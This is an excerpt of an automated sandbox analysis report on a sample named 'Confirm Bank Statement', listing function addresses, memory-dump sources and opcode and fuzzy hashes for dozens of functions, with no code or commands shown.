                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0f67b576d3dc54558018a97b0f772154dd671bb05f2e11a64c97d0b49024261
                                                                                              • Instruction ID: 9b37adb2a5489354b58427b8ea3e3e492c3f0fe90b67eab65af6bc992501f442
                                                                                              • Opcode Fuzzy Hash: a0f67b576d3dc54558018a97b0f772154dd671bb05f2e11a64c97d0b49024261
                                                                                              • Instruction Fuzzy Hash: 1021106292E7D05FE713A73898742E53F619F43016B0A01D7C4D98F0A3A428484CC7AB
                                                                                              Function 055B8730 Relevance: .1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 78ab314f9494051587721a1dc861fb34fb29860bdf375f02e612cc43d7681201
                                                                                              • Instruction ID: 59b96d956e8251a8731f8a083aa533de5c4e251fca81e8f6e382889a028f8ebf
                                                                                              • Opcode Fuzzy Hash: 78ab314f9494051587721a1dc861fb34fb29860bdf375f02e612cc43d7681201
                                                                                              • Instruction Fuzzy Hash: 1021E576A002058FC710DB38D84859BBBF6FFC4214B158969E506DB351EF71EC0A8B91
                                                                                              Function 0727FCB0 Relevance: .1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a4ac39f5af33f05220e7d36bd9c66f494c592ceb7600f2841f06313935bdd97
                                                                                              • Instruction ID: 3d1b8597073eec47438f1deeb5add281badd34ad4b58af77da31fca6d9cde912
                                                                                              • Opcode Fuzzy Hash: 5a4ac39f5af33f05220e7d36bd9c66f494c592ceb7600f2841f06313935bdd97
                                                                                              • Instruction Fuzzy Hash: 0D3136B5D25209DFCB04DFA8D594ADDBBF1EF49310F10806AE805AB360DB34A946CFA0
                                                                                              Function 055BD1DA Relevance: .1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05a2bc29f8c0c5f67bd6f5f677bab9a9de1c5b86691455f5653f6ad2f42d12a0
                                                                                              • Instruction ID: 70ec7bdb055430b78575f4378690312325e99b628497229fea7569b000fe98d9
                                                                                              • Opcode Fuzzy Hash: 05a2bc29f8c0c5f67bd6f5f677bab9a9de1c5b86691455f5653f6ad2f42d12a0
                                                                                              • Instruction Fuzzy Hash: D621D3367007008BDB156B69D448BAEB7B6FFC9320F14052EE84697310DFB1E8428BD1
                                                                                              Function 07270110 Relevance: .1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e7972214d4b02d8f534e07eca1a3c78a757b48ee876cb388f2ec2c29fdcfd8b0
                                                                                              • Instruction ID: 9275c6f1749b7632358495a90f215ce6163bb6a1b4a1167cc79d5db0acc8592c
                                                                                              • Opcode Fuzzy Hash: e7972214d4b02d8f534e07eca1a3c78a757b48ee876cb388f2ec2c29fdcfd8b0
                                                                                              • Instruction Fuzzy Hash: BC21B571711216DFDB20DFA5EA45B6EBBF4FB44295F00402AE409DB290EB34D909CB91
                                                                                              Function 013DD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1265839929.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13dd000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edab476c454810f9f8ff625360115de0e133d7f6c331872668f01afd4dfd39ad
                                                                                              • Instruction ID: 09ae32c46e35c6e06c7318eb04863640980b19a6ea80532e5daa166b744bcc84
                                                                                              • Opcode Fuzzy Hash: edab476c454810f9f8ff625360115de0e133d7f6c331872668f01afd4dfd39ad
                                                                                              • Instruction Fuzzy Hash: ED213672504204DFDB15DF54E9C0B56BF79FB84328F20C16DD8091F286C736E456CAA2
                                                                                              Function 013DD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1265839929.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13dd000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31a6940aa05e90241a590c46f86a4b4a486cd87960e099ef5bdb0323bc8c8c6f
                                                                                              • Instruction ID: f22fad88f741f4b9d24cc0fac44316d6a2f436417c66868ed2ec5304d1bcef37
                                                                                              • Opcode Fuzzy Hash: 31a6940aa05e90241a590c46f86a4b4a486cd87960e099ef5bdb0323bc8c8c6f
                                                                                              • Instruction Fuzzy Hash: 2B212572504244DFDB15DF54E9C0B26BF66FB8832CF60C569E8090F696C336D456CBA2
                                                                                              Function 07272D90 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c1703774d47f9782d81e590e41a9126356bce8bfdc190fc76e26a7343109782
                                                                                              • Instruction ID: 3bc55c89ac346f8f3bc3118a9714a4f34a3410f1c09d72e4c891e41eef5f35a1
                                                                                              • Opcode Fuzzy Hash: 4c1703774d47f9782d81e590e41a9126356bce8bfdc190fc76e26a7343109782
                                                                                              • Instruction Fuzzy Hash: EF217475B102068FCB04DF68CD959EEB7F5FF89200B004679D905E7356EB30A905CBA1
                                                                                              Function 055B2F88 Relevance: .1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fbed9ae7ef7a08cf45c3187b9d143a24428628698433d6ddc3a58fa4978c1f13
                                                                                              • Instruction ID: d796ff37df04834dece37abdbd4922ef06e7a3f3d2ccb02c77e7cf7b57174c39
                                                                                              • Opcode Fuzzy Hash: fbed9ae7ef7a08cf45c3187b9d143a24428628698433d6ddc3a58fa4978c1f13
                                                                                              • Instruction Fuzzy Hash: 192180343042058FDB18DB29C458A6977E5FF89715B1184AEE506CF3B1DBB2EC46CB51
                                                                                              Function 055B0422 Relevance: .1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3241ed2382333c79051edd2d6137f8a4ac95352e8abf629369a12731a7db6372
                                                                                              • Instruction ID: ae1145270e546d7f8d64d7e74bdb04fe3c17183dfc93e95c6853da9e5964b9b3
                                                                                              • Opcode Fuzzy Hash: 3241ed2382333c79051edd2d6137f8a4ac95352e8abf629369a12731a7db6372
                                                                                              • Instruction Fuzzy Hash: E9312874A01209AFDB14DF64D588BDEBBF2BF88310F108469E906A77A1C771AD50CB61
                                                                                              Function 07270100 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d06875fd41dd6aad91ac0c45dedc65153e38d51bb34712eb8aefb35fba249a26
                                                                                              • Instruction ID: 1ad8451e2220db29887d8cff8693042080c38e0f77bcd17a0ba0d7d3641e0527
                                                                                              • Opcode Fuzzy Hash: d06875fd41dd6aad91ac0c45dedc65153e38d51bb34712eb8aefb35fba249a26
                                                                                              • Instruction Fuzzy Hash: E321F3B0B252028FDB31CF64EA65BAA7FF4FB45295F04406AE405DB291EB34DD09CB91
                                                                                              Function 0727906F Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d4d10fa4f9dbb2000d261ccb3067979a4a793c0ff180590da859441d480c42f
                                                                                              • Instruction ID: 9ddc16c74f5757b1086f6fe430fd25d6d909d5ad4ae2d0f345116b7b40bbc929
                                                                                              • Opcode Fuzzy Hash: 4d4d10fa4f9dbb2000d261ccb3067979a4a793c0ff180590da859441d480c42f
                                                                                              • Instruction Fuzzy Hash: 71212CB4929219CFDB10DF98D685AEDBBBAFF0A300F509295D44AA7242C374A8C1CF51
                                                                                              Function 0727FCC0 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4b2865f631153b899e6b37d7c3b7e04268c86a14782f229fdc8db18605891bc
                                                                                              • Instruction ID: 0c64f6736d169a4d1422497cf3be3d426546b786c239e9528b18878b5b2a8c96
                                                                                              • Opcode Fuzzy Hash: a4b2865f631153b899e6b37d7c3b7e04268c86a14782f229fdc8db18605891bc
                                                                                              • Instruction Fuzzy Hash: 3631A3B4E152099FCB04DF99D594AEDBBF1EF49310F108029E915A7360DB74A942CFA4
                                                                                              Function 055B2F98 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4f5678e224cf5acaf9589c0dfacef32f839b172ece8c8ff3d971ac4d94e036e7
                                                                                              • Instruction ID: 05c0dcdf6c49f78e3bb9f2bb0f143e940b48d0a50dfd4779b9aeb1b7dd65df3f
                                                                                              • Opcode Fuzzy Hash: 4f5678e224cf5acaf9589c0dfacef32f839b172ece8c8ff3d971ac4d94e036e7
                                                                                              • Instruction Fuzzy Hash: 62215E343002058FDB28DB29C458A6973E6FF89715B2184ADE506CF370DBB2EC06CB51
                                                                                              Function 013ED01C Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266158138.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13ed000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: acc72783ba744e1ac822d8559222b4afd5c9106f63e9017b687e4c1c5986ee3c
                                                                                              • Instruction ID: f0d2598555bdac31e83f0c432d38e8889153aa8869986f0979afe57a9db5cef9
                                                                                              • Opcode Fuzzy Hash: acc72783ba744e1ac822d8559222b4afd5c9106f63e9017b687e4c1c5986ee3c
                                                                                              • Instruction Fuzzy Hash: D5210071604304DFDB15DF54D988B16BFA5FB84318F28C56DD80A0B786C336D807CA62
                                                                                              Function 013ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266158138.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_13ed000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6c33e6b3ad858c97f4e7bb20c573e3ec51de27b604e2497968cad85c4817875
                                                                                              • Instruction ID: c9bc021871e3a4b1ff004e8148fce129ff24c0aa5347529cd7214535b28d9502
                                                                                              • Opcode Fuzzy Hash: d6c33e6b3ad858c97f4e7bb20c573e3ec51de27b604e2497968cad85c4817875
                                                                                              • Instruction Fuzzy Hash: 6421F575A04304DFDB15DF94D9C8B15BBA5FB84328F20C56DD8494B6D2C336D446CA61
                                                                                              Function 0727AFCD Relevance: .1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fd29bb3409caf6271b6c49cd72b87ef511385b81ed79b85e66b1eb71974d6bc4
                                                                                              • Instruction ID: 6a0e5ba661c89aadcc8fa0d153e206df531304dc4784b67592842c0d12f4b945
                                                                                              • Opcode Fuzzy Hash: fd29bb3409caf6271b6c49cd72b87ef511385b81ed79b85e66b1eb71974d6bc4
                                                                                              • Instruction Fuzzy Hash: E321A1B0D293549FC709CB6AD8509EEBFF6AF8A301F04C06AD815AB251D7358845CF90
                                                                                              Function 07272DA0 Relevance: .1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29d9de7213e8ec00a153ee84fb6cbf2e731901dce7fdc8d1a68f9eac190f8bc1
                                                                                              • Instruction ID: 8e8a82c8ca23c532c8267dd7098182624695c7893d78d06fff91553b2630669d
                                                                                              • Opcode Fuzzy Hash: 29d9de7213e8ec00a153ee84fb6cbf2e731901dce7fdc8d1a68f9eac190f8bc1
                                                                                              • Instruction Fuzzy Hash: 69213275E1020ACFCF04EF69C9948AEB7F5FF88300B108669D905B7355EB70A905CBA1
                                                                                              Function 055BFAD0 Relevance: .1, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a3d46c1c6628fd4335a11aa2b1abd40868623d5a78055e7e4d067af6926fc87
                                                                                              • Instruction ID: 25300375014f2ef0c5edfeb8a13321b93c0c55c3216d911cc0e904836a7f6765
                                                                                              • Opcode Fuzzy Hash: 6a3d46c1c6628fd4335a11aa2b1abd40868623d5a78055e7e4d067af6926fc87
                                                                                              • Instruction Fuzzy Hash: 98216231A106099FCB10EF6CD85099DFBB5FF59310B50C36AE958AB210FB31E998CB91
                                                                                              Function 055B2CC0 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a6b67cbfe461a33b9b45f7b51be6ac4deb857f08fab9122b206f2266eb0057a
                                                                                              • Instruction ID: df6a461db591e32f94544366639577ab8918f4d6fc03f6b700a105161fb2df99
                                                                                              • Opcode Fuzzy Hash: 4a6b67cbfe461a33b9b45f7b51be6ac4deb857f08fab9122b206f2266eb0057a
                                                                                              • Instruction Fuzzy Hash: 1211D535F006164FEB11EF6984486FEB7B2FBC8210F14862AD416A7210DBB8990247D1
                                                                                              Function 055BD648 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35c34937bb772cb8956ae660d165f8ab951f24df9a4fe0436d6527b4ace6fd19
                                                                                              • Instruction ID: c05206ea7659cd5c50388dbd440705508309a062769cfd822620ded8d6c55d2b
                                                                                              • Opcode Fuzzy Hash: 35c34937bb772cb8956ae660d165f8ab951f24df9a4fe0436d6527b4ace6fd19
                                                                                              • Instruction Fuzzy Hash: E821B1326006148FCB24DF2CC849A99B7F9FF49315B1545AAE50AEB331DB72EC45CB90
                                                                                              Function 0727A661 Relevance: .1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d85a919ea81f362bd5a137d1e734479ca46bbfea5e689bb656f3abe4356cb69f
                                                                                              • Instruction ID: 34c92f2c13e65efa76a1c66678fbcd70aa3ad80ad16f1592cb26c85e3729d4f7
                                                                                              • Opcode Fuzzy Hash: d85a919ea81f362bd5a137d1e734479ca46bbfea5e689bb656f3abe4356cb69f
                                                                                              • Instruction Fuzzy Hash: 7521F3B0D29218CFCB04CF98C684AEDB7FABB0A321F209556C80AA7245C375AD81CF51
                                                                                              Function 0727E668 Relevance: .1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 550a128b4af45b6130d227dffbea6044553eda23ebad15f58fd70744bd9f81bd
                                                                                              • Instruction ID: 0dc8a225157779bdd5f73523f4e30c822867dfbc751a5c2e10e2a56867929668
                                                                                              • Opcode Fuzzy Hash: 550a128b4af45b6130d227dffbea6044553eda23ebad15f58fd70744bd9f81bd
                                                                                              • Instruction Fuzzy Hash: 9E11D0B0F202069BDB28AB79990467E7BA2BB84210F05C56DD806CB390EA749C01C7E1
                                                                                              Function 0727B4C0 Relevance: .1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b1f8823215e67f77de526a1453e509b3984f9681b6d57edaa57d651735578ba
                                                                                              • Instruction ID: 2daaf09b1ba486a7ca2ce1eda57ad412c8e5d6a50b0c7e3575617aa472f10ec9
                                                                                              • Opcode Fuzzy Hash: 5b1f8823215e67f77de526a1453e509b3984f9681b6d57edaa57d651735578ba
                                                                                              • Instruction Fuzzy Hash: C421C5B4E28209EFCB44CF99D5859ADFBF9FB4A310F449195D819A7311D770EA80CB40
                                                                                              Function 055B2CB0 Relevance: .1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f56afbc050c74a9b15d47782b25331ae5dff32cbe50592469d3883efd6deb7ac
                                                                                              • Instruction ID: 58859beab96731ebe76c010ec66d32b5c3adfb6d9929ff40d4731ec855aca255
                                                                                              • Opcode Fuzzy Hash: f56afbc050c74a9b15d47782b25331ae5dff32cbe50592469d3883efd6deb7ac
                                                                                              • Instruction Fuzzy Hash: CB112736F006164FEB21DA6988497FFB7A2FBC8610F14443AC516E7310D6B8990247E1
                                                                                              Function 055B8721 Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c46624ddb03b60b2c0e9c324be245c8280b3298b9cd023e4535275eabf30ae13
                                                                                              • Instruction ID: 7620348febeb9dbfc36aceba826662b6ed02429b5922d310621014993814f738
                                                                                              • Opcode Fuzzy Hash: c46624ddb03b60b2c0e9c324be245c8280b3298b9cd023e4535275eabf30ae13
                                                                                              • Instruction Fuzzy Hash: F011B7756002054FC710DB68D849A9B7BF6FFC4315F158969E946DB350EF70EC098B92
                                                                                              Function 072700A8 Relevance: .1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 678d2324fdf6686b40c20681ad1358848dd4cb8594ac512c2a7badf7200fe84d
                                                                                              • Instruction ID: a41deb012befe751d5b976c08a608aff5e95a841c518941bb35e5a2e21d6e9f9
                                                                                              • Opcode Fuzzy Hash: 678d2324fdf6686b40c20681ad1358848dd4cb8594ac512c2a7badf7200fe84d
                                                                                              • Instruction Fuzzy Hash: E12103B17143468FDB21CFA4EA557AA7FB1FF45244F04006AE409DB2D1EB34D909CB51
                                                                                              Function 07275C67 Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5fcdfe2146eb314991cdfd823cf08e1011d4c589439029367d177c6dba08906
                                                                                              • Instruction ID: 4b055a8468658c30949eec7e616db141c727b4098c34adacf5fc8a1a788b57fc
                                                                                              • Opcode Fuzzy Hash: b5fcdfe2146eb314991cdfd823cf08e1011d4c589439029367d177c6dba08906
                                                                                              • Instruction Fuzzy Hash: 502144B5D20209CFDB14CFAAC5453EEFBF2AB49311F00806AD915A7380EBB81950CFA5
                                                                                              Function 07275C78 Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4178b18b1662dc35254118bb36527ff6998736be6294c1b819b148384d5bea9a
                                                                                              • Instruction ID: fa4d166a5f7361df5632ead84109c9830f70f1e1d9bdf7ffbc724b8bde0e2748
                                                                                              • Opcode Fuzzy Hash: 4178b18b1662dc35254118bb36527ff6998736be6294c1b819b148384d5bea9a
                                                                                              • Instruction Fuzzy Hash: 581137B0D21219CBDB14CFAAC5456EEFBF5EB8D320F00802AD515A7340EBB41950CFA4
                                                                                              Function 055B2484 Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e106f78bfe2a144ca819067e1cf51df9f3eac7c634c99b67d45cd344f3a635bb
                                                                                              • Instruction ID: 95bf2d8f0d90a030875864db7a6edabac1ad7997080e43852784f649f393e837
                                                                                              • Opcode Fuzzy Hash: e106f78bfe2a144ca819067e1cf51df9f3eac7c634c99b67d45cd344f3a635bb
                                                                                              • Instruction Fuzzy Hash: 9E217F34600705CFDB68EB78C458AEAB3B7FFC5211F00896DD0591B260DF71A88ACB92
                                                                                              Function 055B36C8 Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
